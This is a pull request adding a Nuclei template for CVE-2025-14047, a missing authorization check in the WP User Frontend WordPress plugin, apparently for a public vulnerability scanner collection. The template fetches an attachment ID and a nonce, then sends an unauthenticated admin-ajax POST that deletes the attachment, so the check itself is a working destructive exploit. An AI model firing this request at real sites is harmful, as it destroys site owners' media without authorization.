### PR TITLE
Add CVE-2025-14047 WPUF template

### DIFF
--- a/http/cves/2026/CVE-2025-14047.yaml
+++ b/http/cves/2026/CVE-2025-14047.yaml
@@ -1,0 +1,105 @@
+id: CVE-2025-14047
+
+info:
+  name: User Frontend <= 4.2.4 - Missing Authorization to Unauthenticated Attachment Deletion
+  author: iamatownboy
+  severity: medium
+  description: |
+    The WP User Frontend plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check in the Frontend_Form_Ajax::submit_post function.
+    This makes it possible for unauthenticated attackers to delete attachment records through the plugin's AJAX handling when a public frontend form is available.
+  impact: |
+    Unauthenticated attackers can delete attachment records, causing data loss for media uploaded through frontend submission forms.
+  remediation: |
+    Update WP User Frontend to version 4.2.5 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-14047
+    - https://wpscan.com/vulnerability/e667278f-7563-4c58-ba82-a6d50e1a7a30/
+    - https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L35
+    - https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L55
+    - https://plugins.trac.wordpress.org/browser/wp-user-frontend/tags/4.2.2/includes/Ajax/Frontend_Form_Ajax.php#L133
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2025-14047
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: wedevs
+    product: wp-user-frontend
+    framework: wordpress
+    publicwww-query: "/plugins/wp-user-frontend/"
+  tags: cve,cve2025,wordpress,wp,wp-plugin,user-frontend,wpuf,authorization-bypass,unauth,ajax
+
+variables:
+  form_id: "1"
+  attachment_id: "1"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wp-user-frontend/readme.txt"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, "WP User Frontend")
+          - compare_versions(version, "<= 4.2.4")
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - '(?i)Stable tag:\s*([0-9.]+)'
+        internal: true
+
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: nonce
+        part: body
+        group: 1
+        regex:
+          - '"wpuf_nonce"\s*:\s*"([a-f0-9]+)"'
+        internal: true
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '"wpuf_nonce"\s*:\s*"[a-f0-9]+"'
+        internal: true
+
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/
+
+        action=wpuf_form_submit&form_id={{form_id}}&attachment_id={{attachment_id}}&attachment_delete=1&nonce={{nonce}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - 'attachment'
+          - 'deleted'
+        condition: or
+# digest: 4a0a00473045022100a02e4ce64b0f95ec2f78018ac8b36a5f28a7c0c7b5cbeb34f9f5e7aa0f8d0ce702207ca4f0d2f8f81e16ea1d1ce1e9cf0e10c5d3ed7c39c6d8cc5d3350d9fdd5c2ab:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2025-14047.yaml
+++ b/http/cves/2026/CVE-2025-14047.yaml
@@ -24,18 +24,14 @@ info:
     cwe-id: CWE-862
   metadata:
     verified: true
-    max-request: 3
+    max-request: 4
     vendor: wedevs
     product: wp-user-frontend
     framework: wordpress
     publicwww-query: "/plugins/wp-user-frontend/"
   tags: cve,cve2025,wordpress,wp,wp-plugin,user-frontend,wpuf,authorization-bypass,unauth,ajax
 
-variables:
-  form_id: "1"
-  attachment_id: "1"
-
-flow: http(1) && http(2) && http(3)
+flow: http(1) && http(2) && http(3) && http(4)
 
 http:
   - method: GET
@@ -45,7 +41,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - contains(body, "WP User Frontend")
+          - contains(body, "User Frontend")
           - compare_versions(version, "<= 4.2.4")
         condition: and
         internal: true
@@ -61,6 +57,29 @@ http:
 
   - raw:
       - |
+        GET /?rest_route=/wp/v2/media HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"type":"attachment"'
+        condition: and
+        internal: true
+
+    extractors:
+      - type: regex
+        name: attachment_id
+        part: body
+        group: 1
+        regex:
+          - '"id":(\d+)'
+        internal: true
+
+  - raw:
+      - |
         GET / HTTP/1.1
         Host: {{Hostname}}
 
@@ -70,14 +89,24 @@ http:
         part: body
         group: 1
         regex:
-          - '"wpuf_nonce"\s*:\s*"([a-f0-9]+)"'
+          - 'id="_wpnonce"\s*name="_wpnonce"\s*value="([a-f0-9]+)"'
+        internal: true
+
+      - type: regex
+        name: form_id
+        part: body
+        group: 1
+        regex:
+          - 'name="form_id"\s*value="(\d+)"'
         internal: true
 
     matchers:
-      - type: regex
+      - type: word
         part: body
-        regex:
-          - '"wpuf_nonce"\s*:\s*"[a-f0-9]+"'
+        words:
+          - 'wpuf_submit_post'
+          - '_wpnonce'
+        condition: and
         internal: true
 
   - raw:
@@ -88,18 +117,15 @@ http:
         Origin: {{BaseURL}}
         Referer: {{BaseURL}}/
 
-        action=wpuf_form_submit&form_id={{form_id}}&attachment_id={{attachment_id}}&attachment_delete=1&nonce={{nonce}}
+        action=wpuf_submit_post&form_id={{form_id}}&delete_attachments[]={{attachment_id}}&_wpnonce={{nonce}}&post_title={{rand_base(8)}}&post_content={{rand_base(8)}}&guest_name={{rand_base(6)}}&guest_email={{rand_base(8)}}@{{rand_base(4)}}.com
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
       - type: word
         part: body
         words:
           - '"success":true'
-          - 'attachment'
-          - 'deleted'
-        condition: or
-# digest: 4a0a00473045022100a02e4ce64b0f95ec2f78018ac8b36a5f28a7c0c7b5cbeb34f9f5e7aa0f8d0ce702207ca4f0d2f8f81e16ea1d1ce1e9cf0e10c5d3ed7c39c6d8cc5d3350d9fdd5c2ab:922c64590222798bb761d5b6d8e72950
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

This PR adds a nuclei template for CVE-2025-14047 affecting the User Frontend WordPress plugin.

The issue is caused by a missing authorization check in the frontend form submission flow, which can allow unauthenticated attackers to delete attachment records when the vulnerable functionality is exposed through a public form.

References:
- NVD
- Wordfence
- WP User Frontend source code

### Template validation

- Validated with `nuclei -validate` in Docker

### Additional Details

- This PR contains a single template file only